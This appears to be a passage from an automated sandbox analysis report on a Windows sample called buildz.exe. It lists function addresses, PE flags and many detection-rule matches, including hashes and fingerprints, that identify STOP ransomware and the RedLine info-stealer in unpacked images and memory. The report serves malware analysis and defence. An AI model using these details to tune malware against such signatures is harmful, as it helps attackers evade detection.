          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0230B0B05_2_0230B0B0
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_023030F05_2_023030F0
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_023070E05_2_023070E0
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_023100D05_2_023100D0
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_023091205_2_02309120
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0234E1415_2_0234E141
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0232D1A45_2_0232D1A4
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0230A6995_2_0230A699
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0234B69F5_2_0234B69F
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0230E6E05_2_0230E6E0
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0230C7605_2_0230C760
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0230A79A5_2_0230A79A
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0232D7F15_2_0232D7F1
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_023035205_2_02303520
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_023075205_2_02307520
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0230CA105_2_0230CA10
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_02307A805_2_02307A80
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_02310B005_2_02310B00
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_02302B605_2_02302B60
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0230DBE05_2_0230DBE0
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_023078805_2_02307880
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_023218D05_2_023218D0
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0230A9165_2_0230A916
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0232F9B05_2_0232F9B0
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0232E9A35_2_0232E9A3
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_023059F75_2_023059F7
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_023089D05_2_023089D0
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_02308E605_2_02308E60
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_02334E9F5_2_02334E9F
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_02342D1E5_2_02342D1E
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_02305DF75_2_02305DF7
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_02305DE75_2_02305DE7
          Source: C:\Users\user\Desktop\buildz.exeCode function: String function: 00428C81 appears 42 times
          Source: C:\Users\user\Desktop\buildz.exeCode function: String function: 004547A0 appears 75 times
          Source: C:\Users\user\Desktop\buildz.exeCode function: String function: 0042F7C0 appears 97 times
          Source: C:\Users\user\Desktop\buildz.exeCode function: String function: 022A8EC0 appears 57 times
          Source: C:\Users\user\Desktop\buildz.exeCode function: String function: 022B0160 appears 50 times
          Source: C:\Users\user\Desktop\buildz.exeCode function: String function: 0044F23E appears 53 times
          Source: C:\Users\user\Desktop\buildz.exeCode function: String function: 00428520 appears 77 times
          Source: C:\Users\user\Desktop\buildz.exeCode function: String function: 00454E50 appears 41 times
          Source: C:\Users\user\Desktop\buildz.exeCode function: String function: 02338EC0 appears 57 times
          Source: C:\Users\user\Desktop\buildz.exeCode function: String function: 02340160 appears 50 times
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: String function: 02330160 appears 50 times
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: String function: 02328EC0 appears 57 times
          Source: buildz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 2.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 8.2.buildz.exe.22b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 8.2.buildz.exe.22b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 4.2.buildz.exe.22815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 4.2.buildz.exe.22815a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 10.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 10.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.buildz.exe.23115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.buildz.exe.23115a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 4.2.buildz.exe.22815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 4.2.buildz.exe.22815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 5.2.buildz.exe.23015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 5.2.buildz.exe.23015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 8.2.buildz.exe.22b15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 8.2.buildz.exe.22b15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 15.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 15.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 12.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 12.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 12.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 12.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 5.2.buildz.exe.23015a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 5.2.buildz.exe.23015a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 15.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 15.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.buildz.exe.23115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.buildz.exe.23115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 11.2.buildz.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 11.2.buildz.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 10.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 10.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 2.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 2.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 11.2.buildz.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 11.2.buildz.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000008.00000002.2313135610.0000000000933000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000005.00000002.2523332173.0000000000814000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0000000B.00000002.2425231784.0000000000A2D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000004.00000002.2188854432.0000000000A42000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
